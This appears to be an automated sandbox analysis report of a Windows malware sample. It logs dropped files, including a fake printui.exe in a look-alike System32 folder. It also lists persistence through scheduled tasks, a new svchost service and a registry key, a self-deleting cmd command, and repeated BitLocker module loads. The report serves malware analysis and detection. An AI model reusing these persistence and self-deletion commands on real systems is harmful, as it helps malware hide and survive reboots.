Source: C:\Users\user\Desktop\pyld64.exeFile created: C:\Windows\System32\usvcinsta64.exeJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeFile created: C:\Users\user\Desktop\pyld64.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x543664.datJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file
Source: C:\Users\user\Desktop\pyld64.exeFile created: C:\Windows\System32\usvcinsta64.exeJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x543664.datJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dllJump to dropped file
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exeJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dllJump to dropped file
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dllJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\reg.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x543664\Parameters
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x543664 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Self deletion via cmd or bat file
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeProcess created: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
